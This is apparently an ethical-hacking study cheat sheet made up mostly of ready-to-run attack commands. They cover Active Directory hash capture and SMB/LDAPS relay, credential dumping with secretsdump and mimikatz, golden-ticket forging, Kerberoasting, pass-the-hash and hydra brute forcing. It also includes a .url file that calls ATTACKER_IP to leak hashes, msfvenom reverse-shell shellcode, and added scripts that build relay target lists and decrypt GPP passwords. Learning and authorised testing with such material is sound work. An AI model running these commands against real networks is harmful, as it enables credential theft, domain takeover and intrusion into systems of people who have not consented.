Ports
service | port
ftp | 21
ssh | 22
telnet | 23
smtp | 25
POP3 | 110
IMAP | 143
smb | 139, 445
DNS | 53
TFTP | 69
SNMP | 161
Google Fu
Use quotation marks to return only results that contain the exact text within the quotes | "Introduction to Cryptography"
Use the site: keyword to return results from one specific website only | Introduction to Cryptography site:stackexchange.com
Use the filetype: keyword to return specific file types; a leading - excludes a term | Introduction to Cryptography -review filetype:pdf
Use allintitle: to match your keywords against page titles only (the classic open-directory dork) | allintitle:index of
Use inurl: to require a particular string in the URL | inurl:admin site:someadminsite.com
Return pages that link to example.com (Google retired the link: operator in 2017, so expect little or nothing back) | link:example.com
Use * as a wildcard: results must begin with "hack", end with "VPN", and may contain anything in between | "hack * VPN"
Return websites that offer services similar to amazon.com, useful for finding competitors of a service | Dell Laptop related:amazon.com
More metasploit
Search for modules from inside msfconsole, narrowing by type and platform | search type:exploit platform:linux ftp
Load a metasploit plugin/extension during a meterpreter session | load PLUGIN_NAME (e.g. load incognito)
Get help on the commands a loaded plugin adds | help (meterpreter lists commands grouped by loaded extension)
Gaining Initial Foothold
Use Responder to capture NTLMv2 hashes via LLMNR/NBT-NS poisoning | responder -I eth0 -dw
Crack a captured NTLMv2 hash with hashcat | hashcat -m 5600 ntlmhash.txt dictionary.txt
Use nmap to enumerate the domain for targets where SMB signing is not required | nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24
If SMB signing is "enabled but not required", an SMB relay attack is (likely) possible. First turn off Responder's own SMB and HTTP servers so the authentication is relayed instead of answered | set SMB = Off and HTTP = Off (and HTTPS = Off where the option exists) in /etc/responder/Responder.conf
Then run Responder and ntlmrelayx.py to relay the poisoned authentications to the hosts in targets.txt and dump their local SAM. The relayed account must be a local admin on the target, and a host cannot be relayed back to itself | responder -I eth0 -r
then ntlmrelayx.py -tf targets.txt -smb2support
To get an interactive SMB shell instead of a SAM dump (connect to the listener it opens, by default nc 127.0.0.1 11000) | ntlmrelayx.py -tf targets.txt -smb2support -i
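The relay only works against hosts that do not require signing, so targets.txt should be built from the nmap scan above, not from the whole subnet. As an added example (not part of these notes), this POSIX shell function reduces `nmap --script=smb2-security-mode.nse -p445` normal output to that list. The nmap text it runs on is constructed sample output with made-up addresses, not a real scan.

```shell
# Added example: build ntlmrelayx.py's targets.txt from nmap smb2-security-mode output.
# Only hosts reporting signing "enabled but not required" (or "disabled") are relay
# candidates; "enabled and required" (the default on domain controllers) is skipped.

relay_targets() {
    # stdin: nmap normal output; stdout: one relayable IP per line
    awk '
        # "Nmap scan report for 10.0.0.5" or "... for host.GOLD.local (10.0.0.5)": take the last field
        /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }
        /Message signing enabled but not required/ { print ip }
        /Message signing disabled/                 { print ip }
    '
}

# Constructed sample output (not a real scan): a DC requiring signing, two workstations
# that do not, and a host with 445 closed.
SAMPLE_NMAP='Nmap scan report for 192.168.57.140
Host is up (0.00050s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
Nmap scan report for 192.168.57.141
Host is up (0.00060s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Nmap scan report for ws02.GOLD.local (192.168.57.142)
Host is up (0.00070s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Nmap scan report for 192.168.57.143
Host is up (0.00080s latency).
PORT    STATE SERVICE
445/tcp closed microsoft-ds'

# Real use: nmap -oN scan.txt --script=smb2-security-mode.nse -p445 192.168.57.0/24
#           relay_targets < scan.txt > targets.txt
printf '%s\n' "$SAMPLE_NMAP" | relay_targets
```

Hosts that show up here but still fail to relay are usually the one the authentication came from (no self-relay) or ones where the relayed user is not a local admin.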
Use impacket's psexec.py, smbexec.py or wmiexec.py to get a shell with a known password | psexec.py GOLD.local/jsnow:johnsnow@192.168.219.5
Use metasploit's psexec | use exploit/windows/smb/psexec >> set options >> run
Exploit IPv6 with mitm6 (Windows prefers IPv6 and most networks have no IPv6 DNS, so the attacker becomes the DNS/WPAD server) and relay the captured authentication to LDAPS on the DC to create an arbitrary domain user. User creation succeeds when a privileged authentication (e.g. a domain admin logging in, or a machine account after reboot with enough rights) is relayed | mitm6 -d GOLD.local
>> ntlmrelayx.py -6 -t ldaps://DC-IP -wh wpad.GOLD.local -l adlootdir
Passback attack on MFP devices (e.g. printers): start a listener on the attack machine >> enumerate the domain for MFPs >> log in to the MFP web UI >> change its LDAP server address to the attack IP and trigger a lookup/test >> the device authenticates to the listener, often with the plaintext LDAP bind credentials | nc -lvnp 389
Sweep the domain for MFP web interfaces with metasploit's http_version scanner | use auxiliary/scanner/http/http_version >> set RHOSTS >> run
---------------------------- Enumerate, Enumerate, Enumerate ----------------------------
Post-Compromise Enumeration
Get the Resultant Set of Policy applied on a host; this shows which GPO took precedence for each setting (/V for verbose, /H report.html for a full HTML report) | gpresult /R
Find file shares on the domain | Invoke-ShareFinder OR Find-DomainShare
------- Enumerating with PowerView -------
Run PowerView (bypass the execution policy for the session first) | powershell -ep bypass >> Import-Module .\PowerView.ps1
Get information about the domain (name, DCs, forest, ...) | Get-NetDomain (alias of Get-Domain)
Get information about the DCs on the domain: name, IP, OS, roles | Get-NetDomainController
Get the Default Domain Policy configuration | Get-DomainPolicy
Access the complete values of any PowerShell property by name | (Get-DomainPolicy).PROPERTY (e.g. (Get-DomainPolicy)."SystemAccess") or Get-DomainPolicy | select PROPERTY
Get information about users on the domain | Get-NetUser or Get-DomainUser
Fetch just one object from Get-NetUser or Get-NetGroup | Get-NetUser -Identity jsnow
or Get-NetGroup -Identity "Domain Admins"
Get all admin groups on the domain, by name or by the admincount flag AdminSDHolder sets on protected groups | Get-NetGroup | Select-Object Name | Select-String "admin"
or Get-DomainGroup -AdminCount | Select-Object Name
Get all users in a group, following nested groups | Get-NetGroupMember -Identity "Enterprise Admins" -Recurse
------- Enumerating with BloodHound -------
Default collection via the SharpHound.ps1 ingestor (noisy) | Import-Module .\SharpHound.ps1 >> Invoke-BloodHound -Domain GOLD.local
More specific, less noisy collection. -CollectionMethod takes one or more (comma-separated) of: Group, LocalGroup, RDP, Session, Trusts, ACL, ComputerOnly | Invoke-BloodHound -Domain GOLD.local -CollectionMethod Group,Session -ZipFilename output.zip
Collect the sessions currently active on the domain repeatedly, since users log in and out all the time | Invoke-BloodHound -CollectionMethod Session -Loop -LoopInterval HH:MM:SS -LoopDuration HH:MM:SS
After collection, copy the zip to kali, start neo4j, open the BloodHound GUI and upload the zip | neo4j console >> bloodhound >> Upload Data
Post Compromise Attacks
Dump every domain account's NTLM hash from the DC (NTDS.dit via DCSync/DRSUAPI, not the local SAM) with secretsdump, using a domain admin | secretsdump.py -just-dc-ntlm GOLD.local/domainadminuser:password@192.168.219.140
Pass a password across a range of computers on the domain | crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow
Pass a hash (NT hash) across a range of computers on the domain. --local-auth logs in as a local account, --sam dumps the SAM wherever the login lands as admin | crackmapexec smb 10.0.0.1/24 -u jsnow -H NThash --local-auth --sam
Dump the local SAM on every host where the pass-the-password lands as admin | crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow --sam
or, for a single host, secretsdump.py GOLD.local/jsnow:johnsnow@10.0.0.1 (without -just-dc-ntlm, which only applies to DCs)
Dump LSA secrets (cached logons, service account passwords) on target computers | crackmapexec smb 192.168.219.0/24 -d DOMAIN.local -u jsnow -p johnsnow --lsa
Crack NTLM hashes with hashcat | hashcat -m 1000 sam_hashes.txt rockyou.txt
Pass the hash for a remote shell with psexec/smbexec/wmiexec.py; -hashes takes LMHASH:NTHASH, so leave the LM part empty | psexec.py win_one:@10.0.0.5 -hashes :NThash
Token impersonation with metasploit's incognito | use exploit/windows/smb/psexec
>> set options >> run
>> load incognito
>> list_tokens -u
>> impersonate_token DOMAIN\\username (double backslash inside meterpreter)
Add a new user via the impersonated token if it is admin: local by default, or on the DC (domain user) with -h | add_user username password [-h DC_IP]
Add a user to a local group | add_localgroup_user groupname user_to_add
Add a user to a domain group (needs a domain admin token) | add_group_user "Domain Admins" user_to_add -h DC_IP
Kerberoasting: request a TGS ticket for every SPN account with a domain user | GetUserSPNs.py GOLD.local/jsnow:johnsnow -dc-ip 192.168.219.140 -request
Kerberoasting with the user's NT hash instead of a password | GetUserSPNs.py GOLD.local/jsnow -dc-ip 192.168.219.140 -hashes :NThash -request
Crack the TGS ticket (RC4/etype 23) with hashcat | hashcat -m 13100 tgs.txt rockyou.txt -O
GPP/cPassword attack: pull SYSVOL and look for Groups.xml (Policies\{GUID}\Machine\Preferences\Groups\); its cpassword attribute is the AES-encrypted password | smbclient \\\\DC-IP\\SYSVOL -U GOLD.local/jsnow%johnsnow
>> prompt off
>> recurse on
>> mget *
Decrypt the cPassword obtained from Groups.xml (the AES key is public, which is why this is an instant win) | gpp-decrypt CPASSWORD
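What gpp-decrypt does under the hood, as an added example that is not part of these notes: cpassword is base64 with its '=' padding stripped, encrypted with AES-256-CBC under the key Microsoft published in MS-GPPREF (2.2.1.1.4) with an all-zero IV, and the plaintext is UTF-16LE. It assumes openssl, base64 and iconv are on the attack box. The Groups.xml fragment is constructed in the shape the file uses; the cpassword value in it is the one from Microsoft's own documentation example, so the plaintext is known.

```shell
# Added example: decrypt a GPP cpassword without gpp-decrypt, using the published AES key.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

gpp_decrypt() {
    cp="$1"
    # restore the base64 '=' padding that GPP strips from the attribute
    while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="${cp}="; done
    printf '%s' "$cp" | base64 -d \
      | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv 00000000000000000000000000000000 \
      | iconv -f UTF-16LE -t UTF-8
}

# Extract the cpassword attribute from a Groups.xml fed on stdin.
cpassword_from_xml() {
    sed -n 's/.*cpassword="\([^"]*\)".*/\1/p'
}

# Constructed Groups.xml fragment (not pulled from a real SYSVOL); the cpassword value is
# the one from Microsoft's documentation sample for this file.
SAMPLE_XML='<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2" changed="2024-01-01 00:00:00" uid="{11111111-2222-3333-4444-555555555555}"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/></User>'

# Real use: find /mnt/sysvol -name Groups.xml | while read -r f; do cpassword_from_xml < "$f" | while read -r c; do gpp_decrypt "$c"; echo; done; done
cp=$(printf '%s\n' "$SAMPLE_XML" | cpassword_from_xml)
gpp_decrypt "$cp"
echo
```

The same key decrypts cpassword in ScheduledTasks.xml, Services.xml, DataSources.xml and Drives.xml, so grep the whole SYSVOL tree, not just Groups.xml.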
URL file attack to harvest more NTLMv2 hashes: drop a .url file in a share that users browse; Explorer fetches the icon over SMB from the attacker and leaks the user's NTLMv2 hash to Responder. The leading @ sorts the file to the top of the listing | create a file named @somefile.url
>> in the created file, put:
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\ATTACKER_IP\%USERNAME%.icon
IconIndex=1
Performing the Print Nightmare attack
Post Compromise Attacks -- Mimikatz
First things first: acquire SeDebugPrivilege so mimikatz can read LSASS | privilege::debug
Dump credentials (hashes and sometimes plaintext) of currently logged on users from LSASS | sekurlsa::logonpasswords
Dump the local SAM hashes | lsadump::sam
Dump a specific account's hash from the DC's LSA (run on the DC; krbtgt is the one the golden ticket needs) | lsadump::lsa /inject /name:krbtgt
Golden Ticket attack: forge a TGT with the krbtgt hash and domain SID and inject it into the current session (/ptt), then misc::cmd for a shell that carries it | kerberos::golden /user:someuser /domain:GOLD.local /sid:DOMAIN-SID /id:500 /krbtgt:NThash /ptt
Useful Linux Commands
To locate a file by name (uses the locate database; run updatedb first if it is stale) | locate FILENAME
To clone a github repo | git clone REPO_URL
For command2 to execute if and only if command1 succeeds | command1 && command2
For command2 to execute if and only if command1 fails | command1 || command2
Print a range of numbers from start to stop with a step increment | seq [START_NO [STEP]] STOP_NO
seq 1 256
To split a string into fields on a delimiter (e.g. space) and select the Nth field. Give a file instead when the text is not on stdin | echo "string to cut into six fields" | cut -d ' ' -f N
cut -d ' ' -f N [FILE]
To list listening ports with the owning process | netstat -tulnp (or ss -tulnp)
To kill the process holding an open port (thus closing the port); the PID comes from the netstat/ss output or lsof -i :PORT | kill PID
To zip a file/directory (-r for recursion) | zip -r zippedfile.zip file-or-dir-to-zip
To unzip a zipped file | unzip zippedfile.zip
To list the crontab for the current user (-u USER for another user, as root) | crontab -l
To create a cronjob that echoes "nice" into a file every minute | crontab -e
--> */1 * * * * echo "nice" >> file.txt
To find SUID files (permission 4000) anywhere under /, discarding permission-denied noise | find / -type f -perm -4000 2>/dev/null
To set the SUID bit on a file | chmod u+s FILE
To set the SGID bit on a file or dir | chmod g+s FILE_OR_DIR
To set the sticky bit on a dir | chmod +t DIR
Network Commands
To get IP info of network interfaces | ip a (or ifconfig)
To get arp neighbours | ip neigh (or arp -a)
To get info on the gateway / routing table | ip route (or route -n)
Users and Privileges
To switch between users | su USERNAME
To run a command as a user without explicitly switching users | su USERNAME -c "COMMAND"
To list the sudo permissions of the current user | sudo -l
To elevate the current terminal to a root shell (needs sudo rights) | sudo -s (or sudo su)
For a persistent root login shell with root's environment | sudo -i (or su -)
To change the password for a user | passwd USERNAME
To add a new user account | adduser USERNAME (or useradd -m USERNAME)
To view all user accounts, or the password hashes (shadow is root-only) | cat /etc/passwd
cat /etc/shadow
To view all groups | cat /etc/group
To view sudo users (sudoers) | cat /etc/sudoers (root) and getent group sudo
Linux Services
To start, stop or restart a service (systemd equivalent: systemctl start|stop|restart SERVICE_NAME) | service SERVICE_NAME start
service SERVICE_NAME stop
service SERVICE_NAME restart
To check the status of a service | service SERVICE_NAME status
Stages of Ethical Hacking
information gathering | using tools like Wappalyzer, BuiltWith, breach-parse
scanning and enumeration | using tools like nmap, dirb, nikto, nessus, sublist3r, amass
gaining access (exploitation) | using tools like searchsploit, exploit-db, metasploit, buffer overflows, bind/reverse shells
post-exploitation | using tools like pspy64, linpeas.sh, winpeas.sh, or by doing a hashdump, passwd/shadow/group/sudoers file dumps, etc
Scanning and Enumeration
Port/Service Scanning/Discovery
Enumerate all devices discoverable on a subnet (ARP) | netdiscover -r 10.10.10.0/24
nmap TCP SYN (half-open) scan on all ports with OS/version detection, default scripts and traceroute (-A = -O -sV -sC --traceroute) | nmap -T4 -sS -p- -A 10.10.10.10
nmap ping sweep over a range of IPs (port scan disabled) | nmap -T4 -sn 10.10.10-124.0-255
nmap SYN scan of selected ports while skipping host discovery (treat every host as up) | nmap -T4 -sS -p1-1024 -A -Pn 10.10.10.0-255
Other scan techniques in place of -sS | -sT (full TCP 3-way handshake scan), -sU (UDP scan)
Nessus scan | service nessusd start
--> https://kali:8834
Nikto scan | nikto -h http://10.10.10.10
HTTP/S Enumeration
Website vulnerability scan with Nikto | nikto -h http://10.10.10.10
Standard directory busting with dirb using the default common.txt wordlist. -w ignores warnings, -r disables recursive search | dirb http://10.10.10.10 -w -r
Directory busting with dirb specifying a wordlist and extensions to append to each word probed | dirb http://10.10.10.10 /usr/share/wordlists/dirb/common.txt -X .php,.txt
Standard directory busting with gobuster | gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
Directory busting with gobuster, specifying threads and file extensions to append to each word | gobuster dir -u http://10.10.10.10 -w WORDLIST -t 50 -x php,txt,html
Enumeration of a website's tech stack | Wappalyzer/BuiltWith browser extensions, or whatweb http://10.10.10.10
Some wordlists to use | /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/.../dirbuster/directory-list-lowercase-2.3-medium.txt
Other useful gobuster options for dirbusting | -c (cookie string), -a (user agent)
Domain Enumeration
Sub-domain enumeration | sublist3r -d domain.com or amass enum -d domain.com
Discover domain names hosted on a server via virtual hosting: reverse-lookup an IP range against the target's own DNS server (-n) | dnsrecon -n SERVER_IP -r IP_RANGE_TO_SEARCH_FOR_DOMAINS
dnsrecon -n 10.10.10.11 -r 127.0.0.0/24
To add a discovered domain to the hosts file | edit /etc/hosts and add the mapping: SERVER_IP DOMAINNAME.COM
To probe domains for http/s servers using tomnomnom's httprobe | cat domain-names.txt | httprobe
SMB Enumeration
Connect to SMB and list share names (-N for a null session, -U user for credentials) | smbclient -L \\\\192.168.219.133 -N
Connect to an SMB share (the $ suffix only for hidden shares such as C$ or ADMIN$) | smbclient \\\\192.168.219.133\\SHARENAME
Enumerate SMB with metasploit auxiliary modules | search type:auxiliary smb
SSH Enumeration
Connecting to SSH on legacy systems: first try a plain ssh login@serverip, then add legacy algorithms incrementally as the server rejects them | ssh username@10.10.10.10 -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-rsa -c aes128-cbc
To connect using a private key (the key file must be chmod 600) | ssh -i id_rsa username@10.10.10.10
NFS Enumeration
List the exports, then mount the network file system on the local machine | showmount -e 10.0.0.1
mount -t nfs 10.0.0.1:/srv/nfs /mnt
Metasploit
Start metasploit (first time: initialise the database first) | msfconsole
or msfdb init && msfconsole
To search for an exploit | search NAME (e.g. search type:exploit smb)
After a search, to select an exploit | use N (index from the search) or use exploit/path/to/module
To see the options of an exploit | show options
To set a value for an option | set OPTION VALUE
To run the exploit | run (or exploit)
Automate metasploit with resource scripts (.rc files) | msfconsole -r FILE_NAME.rc
To get the list of all metasploit payloads via msfvenom | msfvenom -l payloads
To get the list of all options of a payload | msfvenom -p payload_name --list-options
To get the list of payload output formats supported by msfvenom | msfvenom -l formats
Basic syntax for using msfvenom | msfvenom -p payload_name OPTION1=VALUE1 OPTION2=VALUE2 -a sys_arch -f out_file_format -o out_file_name
Create reverse-shell shellcode (e.g. for a buffer overflow exploit); -b excludes bad characters, EXITFUNC=thread keeps the host process alive when the shell exits | msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=2222 EXITFUNC=thread -b "\x00" -a x86 -f c
Searchsploit / Exploit-db
To search for an exploit on exploit-db | use the exploit-db website, or searchsploit EXPLOIT_NAME in the terminal
After a search, to get the full local path of an exploit on the system (-m copies it into the current directory) | searchsploit -p EXPLOITDB_ID
Bruteforce
Bruteforce the password of one username against a service with hydra | hydra -l username -P /path/to/passwordlist service://ip_addr:port
hydra -l john -P /usr/share/john/password.lst ssh://10.0.0.1:22
Try a username list against a password list with hydra | hydra -L users.txt -P passwords.txt service://ip_addr:port
Credential stuffing with hydra using a file of colon-separated "uname:pass" pairs against multiple targets (-s sets the port; -p would be a single password) | hydra -C logins.txt -M targets.txt -s 139 smb
Bruteforce the password of a zip file | fcrackzip -u -D -p /path/to/wordlist zipfile_name
For bruteforcing websites/apps, use Burp Suite >> Intruder. Sniper: one payload set, tried at each position in turn (e.g. several passwords against one username, or one password sprayed over usernames). Pitchfork: payload sets walked in parallel, so line N of the usernames is paired with line N of the passwords (credential stuffing of known pairs). Cluster bomb: every combination of username and password.
Dump password hashes of user accounts | cat /etc/shadow (Linux, as root), or the SAM/NTDS dumps above for Windows
To identify the type of a hash | hashid HASH or hash-identifier; compare the format against hashcat --example-hashes
Crack a hash with hashcat | hashcat -m hash-mode digest /path/to/wordlist
hashcat -m 0 cd7350282... wordlist.txt
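The hashcat modes scattered through this sheet (5600, 1000, 13100, 0) can be told apart by the shape of the hash, which is what hashid does. As an added example that is not part of these notes, this POSIX shell function maps the formats collected above to their -m mode and flags the one case shape cannot settle: a bare 32-hex digest is MD5 (-m 0) or NTLM (-m 1000) depending on where it came from. The sample hashes are constructed, except that 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of the empty password.

```shell
# Added example: pick the hashcat -m mode from the hash's format.
hash_mode() {
    h="$1"
    case "$h" in
        '$krb5tgs$23$'*)         echo 13100 ;;   # Kerberos TGS-REP etype 23 (GetUserSPNs.py -request)
        '$krb5asrep$23$'*)       echo 18200 ;;   # Kerberos AS-REP etype 23 (GetNPUsers.py)
        *:*:*:*:::)              echo 1000 ;;    # pwdump line user:rid:LM:NT::: (secretsdump, cme --sam)
        *::*:*:*:*)              echo 5600 ;;    # NetNTLMv2 user::DOMAIN:challenge:proof:blob (Responder)
        '$6$'*)                  echo 1800 ;;    # sha512crypt from /etc/shadow
        '$1$'*)                  echo 500 ;;     # md5crypt from /etc/shadow
        '$2a$'*|'$2b$'*|'$2y$'*) echo 3200 ;;    # bcrypt
        *[!0-9a-fA-F]*)          echo unknown; return 1 ;;
        *)  case ${#h} in                        # bare hex: only the length is left to go on
                32) echo '0 or 1000' ;;          # MD5 or NTLM, identical shape; the source decides
                40) echo 100 ;;                  # SHA-1
                64) echo 1400 ;;                 # SHA-256
                *)  echo unknown; return 1 ;;
            esac ;;
    esac
}

# hashcat -m 1000 wants only the NT field of a pwdump line; this strips the rest.
nt_from_pwdump() {
    printf '%s' "$1" | cut -d: -f4
}

# Constructed samples (not real credentials) in the shapes the tools above emit.
for sample in \
    '$krb5tgs$23$*svc_sql$GOLD.LOCAL$MSSQLSvc/db.gold.local~1433*$0a1b2c3d4e5f60718293a4b5c6d7e8f9$00112233' \
    'jsnow::GOLD:1122334455667788:0a1b2c3d4e5f60718293a4b5c6d7e8f9:0101000000000000c0653150de09d201' \
    'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::' \
    '31d6cfe0d16ae931b73c59d7e0c089c0' \
    '$6$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdef'
do
    printf '%-10s %s\n' "$(hash_mode "$sample")" "$sample"
done
```

The pwdump and NetNTLMv2 patterns are ordered before the generic ones on purpose: a NetNTLMv2 line has a double colon after the username while a pwdump line ends in three, and neither is pure hex, so neither falls through to the length check.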